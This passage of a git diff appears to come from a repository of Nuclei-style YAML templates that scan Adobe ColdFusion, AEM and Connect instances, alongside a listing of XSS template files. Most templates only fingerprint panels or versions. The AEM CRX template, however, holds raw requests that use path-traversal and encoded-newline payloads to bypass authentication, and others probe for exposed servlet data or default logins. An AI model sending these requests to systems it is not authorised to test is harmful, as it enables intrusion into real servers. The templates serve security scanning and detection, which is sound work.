+./poc/xss/geovision-geowebserver-xss.yaml ./poc/xss/global-domains-xss-7717.yaml ./poc/xss/global-domains-xss-7718.yaml +./poc/xss/global-domains-xss.yaml ./poc/xss/globalprotect-xss.yaml ./poc/xss/graphql-playround-xss.yaml ./poc/xss/gz-forum-script-xss.yaml @@ -102441,12 +102465,12 @@ ./poc/xss/header_blind_xss.yaml ./poc/xss/hidden xss.yaml ./poc/xss/httpbin-xss-8053.yaml +./poc/xss/httpbin-xss.yaml ./poc/xss/httpbin-xss.yml ./poc/xss/id-q-xss.yaml ./poc/xss/id-xss.yaml ./poc/xss/java-melody-xss-8225.yaml ./poc/xss/java-melody-xss-8226.yaml -./poc/xss/java-melody-xss.yaml ./poc/xss/jenkins-audit-trail-xss.yaml ./poc/xss/kafdrop-xss-8411.yaml ./poc/xss/kafdrop-xss-8413.yaml @@ -102467,14 +102491,14 @@ ./poc/xss/microweber-stored-xss.yaml ./poc/xss/microweber-xss-8864.yaml ./poc/xss/microweber-xss-8865.yaml +./poc/xss/mida-eframework-xss-8866.yaml ./poc/xss/mida-eframework-xss-8867.yaml -./poc/xss/mida-eframework-xss-8868.yaml ./poc/xss/mida-eframework-xss-8869.yaml +./poc/xss/mida-eframework-xss.yaml ./poc/xss/moodle-auth-xss.yaml ./poc/xss/moodle-filter-jmol-xss-8942.yaml ./poc/xss/moodle-filter-jmol-xss-8943.yaml ./poc/xss/moodle-filter-jmol-xss-8944.yaml -./poc/xss/moodle-filter-jmol-xss-8945.yaml ./poc/xss/moodle-filter-jmol-xss-8946.yaml ./poc/xss/moodle-filter-jmol-xss-8947.yaml ./poc/xss/moodle-filter-jmol-xss.yaml @@ -102486,6 +102510,7 @@ ./poc/xss/moodle-xss-8952.yaml ./poc/xss/ms-exchange-server-reflected-xss-8962.yaml ./poc/xss/ms-exchange-server-reflected-xss-8963.yaml +./poc/xss/ms-exchange-server-reflected-xss-8964.yaml ./poc/xss/ms-exchange-server-reflected-xss-8965.yaml ./poc/xss/ms-exchange-server-reflected-xss.yaml ./poc/xss/multiples-swagger-xss-indentify.yaml @@ -102493,7 +102518,7 @@ ./poc/xss/my-chatbot-xss-8979.yaml ./poc/xss/my-chatbot-xss.yaml ./poc/xss/myfactory-fms-xss.yaml -./poc/xss/netsweeper-rxss.yaml +./poc/xss/netsweeper-rxss-9065.yaml ./poc/xss/nginx-module-vts-xss-9106.yaml ./poc/xss/nginx-module-vts-xss-9107.yaml ./poc/xss/nginx-module-vts-xss-9108.yaml @@ -102521,6 +102546,7 @@ ./poc/xss/parentlink-xss-2.yaml ./poc/xss/parentlink-xss-9466.yaml ./poc/xss/parentlink-xss-9467.yaml +./poc/xss/php-timeclock-xss-9550.yaml ./poc/xss/php-timeclock-xss-9551.yaml ./poc/xss/php-timeclock-xss-9552.yaml ./poc/xss/php-timeclock-xss-9553.yaml @@ -102534,12 +102560,15 @@ ./poc/xss/rails6-xss-9798.yaml ./poc/xss/rails6-xss-9799.yaml ./poc/xss/rails6-xss-9800.yaml +./poc/xss/rails6-xss.yaml ./poc/xss/reflected-xss-apollo.yaml ./poc/xss/reflected-xss.yaml +./poc/xss/rockmongo-xss-9901.yaml ./poc/xss/rockmongo-xss-9902.yaml ./poc/xss/rockmongo-xss-9903.yaml ./poc/xss/rockmongo-xss-9904.yaml ./poc/xss/rxss.yaml +./poc/xss/samsung-wlan-ap-xss-10012.yaml ./poc/xss/samsung-wlan-ap-xss-10013.yaml ./poc/xss/samsung-wlan-ap-xss-10014.yaml ./poc/xss/sassy-social-share-xss.yaml @@ -102560,22 +102589,22 @@ ./poc/xss/swagger-xss.yaml ./poc/xss/t-soft-e-commerce4-urunadi-stored-xss.yaml ./poc/xss/thruk-xss-10758.yaml +./poc/xss/thruk-xss-10759.yaml ./poc/xss/tikiwiki-reflected-xss-1.yaml ./poc/xss/tikiwiki-reflected-xss-10777.yaml -./poc/xss/tikiwiki-reflected-xss-10778.yaml ./poc/xss/tikiwiki-reflected-xss-10779.yaml ./poc/xss/tikiwiki-reflected-xss-10780.yaml ./poc/xss/tikiwiki-reflected-xss-2.yaml ./poc/xss/tikiwiki-reflected-xss.yaml ./poc/xss/top-15-xss.yaml ./poc/xss/top-xss-params-10806.yaml +./poc/xss/top-xss-params-10807.yaml ./poc/xss/top-xss-params-10808.yaml -./poc/xss/top-xss-params-10809.yaml ./poc/xss/top-xss-params.yaml ./poc/xss/turbocrm-xss-10848.yaml ./poc/xss/turbocrm-xss-10849.yaml ./poc/xss/turbocrm-xss-10850.yaml -./poc/xss/turbocrm-xss.yaml +./poc/xss/turbocrm-xss-10851.yaml ./poc/xss/uncode_xss.yaml ./poc/xss/vanguard-post-xss-10992.yaml ./poc/xss/vanguard-post-xss-10993.yaml @@ -102585,12 +102614,13 @@ ./poc/xss/weblogic-servlet-xss.yml ./poc/xss/wems-enterprise-xss.yaml ./poc/xss/wems-manager-xss-11191.yaml +./poc/xss/wems-manager-xss-11192.yaml ./poc/xss/wems-manager-xss-11193.yaml ./poc/xss/wems-manager-xss-11194.yaml -./poc/xss/wems-manager-xss.yaml ./poc/xss/window-name-domxss-11212.yaml ./poc/xss/window-name-domxss-11213.yaml ./poc/xss/window-name-domxss-11214.yaml +./poc/xss/window-name-domxss.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11354.yaml ./poc/xss/wordpress-wordfence-waf-bypass-xss-11355.yaml @@ -102601,30 +102631,30 @@ ./poc/xss/wordpress-wordfence-xss-11361.yaml ./poc/xss/wordpress-wordfence-xss-11362.yaml ./poc/xss/wordpress-wordfence-xss.yaml +./poc/xss/wordpress-zebra-form-xss-11375.yaml ./poc/xss/wordpress-zebra-form-xss-11376.yaml -./poc/xss/wordpress-zebra-form-xss-11377.yaml ./poc/xss/wordpress-zebra-form-xss-11378.yaml ./poc/xss/wordpress-zebra-form-xss-11379.yaml ./poc/xss/wordpress-zebra-form-xss.yaml ./poc/xss/wp-adaptive-xss-11403.yaml ./poc/xss/wp-adaptive-xss-11404.yaml +./poc/xss/wp-adaptive-xss.yaml ./poc/xss/wp-ambience-xss-11407.yaml ./poc/xss/wp-ambience-xss-11409.yaml ./poc/xss/wp-ambience-xss-11410.yaml ./poc/xss/wp-ambience-xss.yaml -./poc/xss/wp-church-admin-xss-11419.yaml ./poc/xss/wp-church-admin-xss-11420.yaml ./poc/xss/wp-church-admin-xss-11421.yaml ./poc/xss/wp-church-admin-xss-11422.yaml ./poc/xss/wp-church-admin-xss-11423.yaml ./poc/xss/wp-church-admin-xss-11424.yaml ./poc/xss/wp-church-admin-xss.yaml +./poc/xss/wp-code-snippets-xss-11425.yaml ./poc/xss/wp-code-snippets-xss-11426.yaml -./poc/xss/wp-code-snippets-xss.yaml ./poc/xss/wp-custom-tables-xss-11431.yaml ./poc/xss/wp-custom-tables-xss-11432.yaml +./poc/xss/wp-custom-tables-xss-11433.yaml ./poc/xss/wp-custom-tables-xss-11434.yaml -./poc/xss/wp-custom-tables-xss-11435.yaml ./poc/xss/wp-custom-tables-xss.yaml ./poc/xss/wp-finder-xss-11445.yaml ./poc/xss/wp-finder-xss-11447.yaml @@ -102641,11 +102671,11 @@ ./poc/xss/wp-knews-xss-11484.yaml ./poc/xss/wp-knews-xss-11485.yaml ./poc/xss/wp-knews-xss-11486.yaml -./poc/xss/wp-knews-xss-11487.yaml ./poc/xss/wp-knews-xss-11488.yaml ./poc/xss/wp-knews-xss.yaml ./poc/xss/wp-nextgen-xss-11514.yaml ./poc/xss/wp-nextgen-xss-11515.yaml +./poc/xss/wp-nextgen-xss-11516.yaml ./poc/xss/wp-nextgen-xss-11517.yaml ./poc/xss/wp-nextgen-xss-11518.yaml ./poc/xss/wp-nextgen-xss.yaml @@ -102658,15 +102688,16 @@ ./poc/xss/wp-plugin-marmoset-viewer-xss.yaml ./poc/xss/wp-qwiz-online-xss.yaml ./poc/xss/wp-securimage-xss-11556.yaml +./poc/xss/wp-securimage-xss-11557.yaml ./poc/xss/wp-securimage-xss-11558.yaml ./poc/xss/wp-securimage-xss-11559.yaml +./poc/xss/wp-securimage-xss-11560.yaml ./poc/xss/wp-securimage-xss.yaml +./poc/xss/wp-slideshow-xss-11572.yaml ./poc/xss/wp-slideshow-xss-11573.yaml ./poc/xss/wp-slideshow-xss-11574.yaml ./poc/xss/wp-slideshow-xss-11575.yaml -./poc/xss/wp-slideshow-xss-11576.yaml ./poc/xss/wp-slideshow-xss.yaml -./poc/xss/wp-socialfit-xss-11577.yaml ./poc/xss/wp-socialfit-xss-11579.yaml ./poc/xss/wp-socialfit-xss-11580.yaml ./poc/xss/wp-socialfit-xss-11581.yaml @@ -102675,14 +102706,12 @@ ./poc/xss/wp-whmcs-xss-11613.yaml ./poc/xss/wp-whmcs-xss.yaml ./poc/xss/wpmudev-my-calender-xss-11502.yaml -./poc/xss/wpmudev-my-calender-xss-11503.yaml ./poc/xss/wpmudev-my-calender-xss.yaml ./poc/xss/xss-check.yaml ./poc/xss/xss-fuzz.yaml ./poc/xss/xss-fuzz.yml ./poc/xss/xss-inside-tag-top-params.yaml ./poc/xss/xss-path.yaml -./poc/xss/xss-prober.yaml ./poc/xss/xss-reflected.yaml ./poc/xss/xss-stored.yaml ./poc/xss/xss-vuln-params.yaml diff --git a/poc/adobe/adobe-coldfusion-detect-82.yaml b/poc/adobe/adobe-coldfusion-detect-82.yaml deleted file mode 100644 index 0d9330c87c..0000000000 --- a/poc/adobe/adobe-coldfusion-detect-82.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: adobe-coldfusion-detect - -info: - name: Adobe ColdFusion Detector - author: philippedelteil - severity: info - description: With this template we can detect the version number of Coldfusion instances based on their logos. - tags: adobe,coldfusion - -requests: - - method: GET - path: - - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif" - - "{{BaseURL}}/cfide/administrator/images/mx_login.gif" - - "{{BaseURL}}/CFIDE/administrator/images/background.jpg" - - "{{BaseURL}}/cfide/administrator/images/background.jpg" - - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" - - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" - - redirects: true - stop-at-first-match: true - max-redirects: 2 - matchers: - - type: dsl - name: "coldfusion-8" - dsl: - - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))" - - - type: dsl - name: "coldfusion-9" - dsl: - - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))" - - - type: dsl - name: "coldfusion-10" - dsl: - - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))" - - - type: dsl - name: "coldfusion-11" - dsl: - - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))" - - - type: dsl - name: "coldfusion-2016" - dsl: - - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))" - - - type: dsl - name: "coldfusion-2021" - dsl: - - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))" - - - type: dsl - name: "coldfusion-2018" - dsl: - - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))" - - - type: dsl - name: "coldfusion-mx-7" - dsl: - - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" diff --git a/poc/adobe/adobe-coldfusion-detect.yaml b/poc/adobe/adobe-coldfusion-detect-83.yaml similarity index 100% rename from poc/adobe/adobe-coldfusion-detect.yaml rename to poc/adobe/adobe-coldfusion-detect-83.yaml diff --git a/poc/adobe/adobe-component-login-91.yaml b/poc/adobe/adobe-component-login-91.yaml new file mode 100644 index 0000000000..c0042aed5b --- /dev/null +++ b/poc/adobe/adobe-component-login-91.yaml @@ -0,0 +1,23 @@ +id: adobe-component-login + +info: + name: Adobe Component Browser Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-component-login-92.yaml b/poc/adobe/adobe-component-login-92.yaml index cf0a6e2a19..cc39191db5 100644 --- a/poc/adobe/adobe-component-login-92.yaml +++ b/poc/adobe/adobe-component-login-92.yaml @@ -1,17 +1,15 @@ id: adobe-component-login - info: - name: Adobe Component Brower Login + name: Adobe Component Browser Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6846 - tags: panel - + tags: panel,adobe requests: - method: GET path: - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - + - '{{BaseURL}}/cfide/componentutils/login.cfm' matchers-condition: and matchers: - type: word diff --git a/poc/adobe/adobe-connect-central-login-96.yaml b/poc/adobe/adobe-connect-central-login-96.yaml index fdaf816057..1218c9f8d7 100644 --- a/poc/adobe/adobe-connect-central-login-96.yaml +++ b/poc/adobe/adobe-connect-central-login-96.yaml @@ -1,18 +1,10 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login Panel + name: Adobe Connect Central Login author: dhiyaneshDk - description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel,connect-central - reference: - - https://www.adobe.com/products/adobeconnect.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 + tags: adobe,panel requests: - method: GET @@ -29,5 +21,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-connect-central-login-97.yaml b/poc/adobe/adobe-connect-central-login-97.yaml index 1218c9f8d7..fdaf816057 100644 --- a/poc/adobe/adobe-connect-central-login-97.yaml +++ b/poc/adobe/adobe-connect-central-login-97.yaml @@ -1,10 +1,18 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk + description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel + tags: adobe,panel,connect-central + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-connect-username-exposure.yaml b/poc/adobe/adobe-connect-username-exposure.yaml index e47b4fe88b..689bfff679 100644 --- a/poc/adobe/adobe-connect-username-exposure.yaml +++ b/poc/adobe/adobe-connect-username-exposure.yaml @@ -1,26 +1,31 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - author: dhiyaneshDk - severity: low - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + author: dhiyaneshDk + severity: low + reference: + - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + metadata: + max-request: 1 + tags: adobe,disclosure,packetstorm,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022054d3cfda4269a5144451acac0deb50148c53fd37c89a9487c5c4d9fcdc3137f9022100f645424c6588a531143afdbe088305b28d05141d939172eb0649c2423bd4a0f6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-connect-version.yaml b/poc/adobe/adobe-connect-version.yaml new file mode 100644 index 0000000000..664993c1de --- /dev/null +++ b/poc/adobe/adobe-connect-version.yaml @@ -0,0 +1,28 @@ +id: adobe-connect-version + +info: + name: Adobe Connect Central Version + author: dhiyaneshDk + severity: info + tags: adobe + +requests: + - method: GET + path: + - "{{BaseURL}}/version.txt" + + matchers-condition: and + matchers: + - type: word + words: + - 'package=' + part: body + + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-experience-manager-login-105.yaml b/poc/adobe/adobe-experience-manager-login-105.yaml index 2162a6646f..4dbdef1e18 100644 --- a/poc/adobe/adobe-experience-manager-login-105.yaml +++ b/poc/adobe/adobe-experience-manager-login-105.yaml @@ -1,11 +1,19 @@ id: adobe-experience-manager-login info: - name: Adobe-Experience-Manager + name: Adobe Experience Manager Login Panel author: dhiyaneshDK + description: An Adobe Experience Manager login panel was detected. severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html tags: panel,aem,adobe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-media-server-112.yaml b/poc/adobe/adobe-media-server-112.yaml new file mode 100644 index 0000000000..2ee6efc2c8 --- /dev/null +++ b/poc/adobe/adobe-media-server-112.yaml @@ -0,0 +1,30 @@ +id: adobe-media-server + +info: + name: Adobe Media Server Login Panel + author: dhiyaneshDK + severity: info + description: An Adobe Media Server login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Media Server' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-media-server-114.yaml b/poc/adobe/adobe-media-server-114.yaml index deaf55913a..5fb03ce9f3 100644 --- a/poc/adobe/adobe-media-server-114.yaml +++ b/poc/adobe/adobe-media-server-114.yaml @@ -1,13 +1,20 @@ id: adobe-media-server info: - name: Adobe Media Server + name: Adobe Media Server Login Panel author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + description: An Adobe Media Server login panel was detected. + reference: + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.title:"Adobe Media Server" tags: panel,adobe -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -21,3 +28,5 @@ requests: - type: status status: - 200 + +# digest: 4b0a00483046022100a7fdf172f6f056f8d141a0d36a11e07be1db35d83d5497ff1747a7763e449505022100b06e6481fb3fb9cafe9b1ee597924f4ccd349f8b8bce5b6a5ecf98fb6c11383e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-media-server-115.yaml b/poc/adobe/adobe-media-server-115.yaml index 2ee6efc2c8..deaf55913a 100644 --- a/poc/adobe/adobe-media-server-115.yaml +++ b/poc/adobe/adobe-media-server-115.yaml @@ -1,15 +1,10 @@ id: adobe-media-server info: - name: Adobe Media Server Login Panel + name: Adobe Media Server author: dhiyaneshDK severity: info - description: An Adobe Media Server login panel was detected. - reference: - - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 - - https://helpx.adobe.com/support/adobe-media-server.html - classification: - cwe-id: CWE-200 + reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 tags: panel,adobe requests: @@ -26,5 +21,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/aem-bg-servlet-127.yaml b/poc/adobe/aem-bg-servlet-127.yaml deleted file mode 100644 index b751c4f52a..0000000000 --- a/poc/adobe/aem-bg-servlet-127.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: aem-bg-servlet - -info: - name: AEM BG-Servlets - author: DhiyaneshDk - severity: info - reference: - - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig - -http: - - method: GET - path: - - '{{BaseURL}}/system/bgservlets/test.css' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '
Flushing output
' - -# digest: 4a0a00473045022011679f68ea9ea8736dfbf616cd843e2cd2a218f0f4d79653b8e1b3f66e88310a022100e65d71edf92b948507e7fd6c201b5804ca45fc3c262753fe9804347322869acf:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-crx-bypass-132.yaml b/poc/adobe/aem-crx-bypass-132.yaml deleted file mode 100644 index 6607f936be..0000000000 --- a/poc/adobe/aem-crx-bypass-132.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: aem-crx-bypass -info: - author: dhiyaneshDK - name: AEM CRX Bypass - severity: critical - reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ - tags: aem -requests: - - raw: - - | - GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - - | - GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'buildCount' - - 'downloadName' - - 'acHandling' - condition: and - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 200 diff --git a/poc/adobe/aem-crx-bypass-133.yaml b/poc/adobe/aem-crx-bypass-133.yaml new file mode 100644 index 0000000000..cdb6438ebc --- /dev/null +++ b/poc/adobe/aem-crx-bypass-133.yaml @@ -0,0 +1,46 @@ +id: aem-crx-bypass + +info: + name: AEM Package Manager - Authentication Bypass + author: dhiyaneshDK + description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed. + severity: critical + remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages." + reference: + - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ + tags: aem,adobe + +requests: + - raw: + - | + GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + + - | + GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'buildCount' + - 'downloadName' + - 'acHandling' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/poc/adobe/aem-crx-bypass-134.yaml b/poc/adobe/aem-crx-bypass-134.yaml index cdb6438ebc..a6187d442a 100644 --- a/poc/adobe/aem-crx-bypass-134.yaml +++ b/poc/adobe/aem-crx-bypass-134.yaml @@ -1,14 +1,11 @@ id: aem-crx-bypass info: - name: AEM Package Manager - Authentication Bypass author: dhiyaneshDK - description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed. + name: AEM CRX Bypass severity: critical - remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages." - reference: - - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ - tags: aem,adobe + reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ + tags: aem requests: - raw: @@ -42,5 +39,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/poc/adobe/aem-default-get-servlet-135.yaml b/poc/adobe/aem-default-get-servlet-135.yaml deleted file mode 100644 index 7842d3d3da..0000000000 --- a/poc/adobe/aem-default-get-servlet-135.yaml +++ /dev/null @@ -1,91 +0,0 @@ -id: aem-default-get-servlet -info: - author: DhiyaneshDk - name: AEM DefaultGetServlet - severity: low - description: Sensitive information might be exposed via AEM DefaultGetServlet. - reference: - - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - tags: aem,adobe - - -requests: - - method: GET - path: - - '{{BaseURL}}/etc' - - '{{BaseURL}}/var' - - '{{BaseURL}}/apps' - - '{{BaseURL}}/home' - - '{{BaseURL}}///etc' - - '{{BaseURL}}///var' - - '{{BaseURL}}///apps' - - '{{BaseURL}}///home' - - '{{BaseURL}}/.json' - - '{{BaseURL}}/.1.json' - - '{{BaseURL}}/....4.2.1....json' - - '{{BaseURL}}/.json?FNZ.css' - - '{{BaseURL}}/.json?FNZ.ico' - - '{{BaseURL}}/.json?FNZ.html' - - '{{BaseURL}}/.json/FNZ.css' - - '{{BaseURL}}/.json/FNZ.html' - - '{{BaseURL}}/.json/FNZ.png' - - '{{BaseURL}}/.json/FNZ.ico' - - '{{BaseURL}}/.children.1.json' - - '{{BaseURL}}/.children....4.2.1....json' - - '{{BaseURL}}/.children.json?FNZ.css' - - '{{BaseURL}}/.children.json?FNZ.ico' - - '{{BaseURL}}/.children.json?FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.css' - - '{{BaseURL}}/.children.json/FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.png' - - '{{BaseURL}}/.children.json/FNZ.ico' - - '{{BaseURL}}/etc.json' - - '{{BaseURL}}/etc.1.json' - - '{{BaseURL}}/etc....4.2.1....json' - - '{{BaseURL}}/etc.json?FNZ.css' - - '{{BaseURL}}/etc.json?FNZ.ico' - - '{{BaseURL}}/etc.json?FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.css' - - '{{BaseURL}}/etc.json/FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.ico' - - '{{BaseURL}}/etc.children.json' - - '{{BaseURL}}/etc.children.1.json' - - '{{BaseURL}}/etc.children....4.2.1....json' - - '{{BaseURL}}/etc.children.json?FNZ.css' - - '{{BaseURL}}/etc.children.json?FNZ.ico' - - '{{BaseURL}}/etc.children.json?FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.css' - - '{{BaseURL}}/etc.children.json/FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.png' - - '{{BaseURL}}/etc.children.json/FNZ.ico' - - '{{BaseURL}}///etc.json' - - '{{BaseURL}}///etc.1.json' - - '{{BaseURL}}///etc....4.2.1....json' - - '{{BaseURL}}///etc.json?FNZ.css' - - '{{BaseURL}}///etc.json?FNZ.ico' - - '{{BaseURL}}///etc.json/FNZ.html' - - '{{BaseURL}}///etc.json/FNZ.png' - - '{{BaseURL}}///etc.json/FNZ.ico' - - '{{BaseURL}}///etc.children.json' - - '{{BaseURL}}///etc.children.1.json' - - '{{BaseURL}}///etc.children....4.2.1....json' - - '{{BaseURL}}///etc.children.json?FNZ.css' - - '{{BaseURL}}///etc.children.json?FNZ.ico' - - '{{BaseURL}}///etc.children.json?FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.css' - - '{{BaseURL}}///etc.children.json/FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.png' - - '{{BaseURL}}///etc.children.json/FNZ.ico' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'jcr:createdBy' - condition: and diff --git a/poc/adobe/aem-default-get-servlet-138.yaml b/poc/adobe/aem-default-get-servlet-136.yaml similarity index 100% rename from poc/adobe/aem-default-get-servlet-138.yaml rename to poc/adobe/aem-default-get-servlet-136.yaml diff --git a/poc/adobe/aem-default-login-140.yaml b/poc/adobe/aem-default-login-140.yaml deleted file mode 100644 index 30c718c891..0000000000 --- a/poc/adobe/aem-default-login-140.yaml +++ /dev/null @@ -1,65 +0,0 @@ -id: aem-default-login - -info: - name: Adobe AEM Default Login - author: random-robbie - severity: high - description: Adobe AEM default login credentials were discovered. - reference: - - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 8 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,default-login,adobe - -http: - - raw: - - | - POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - 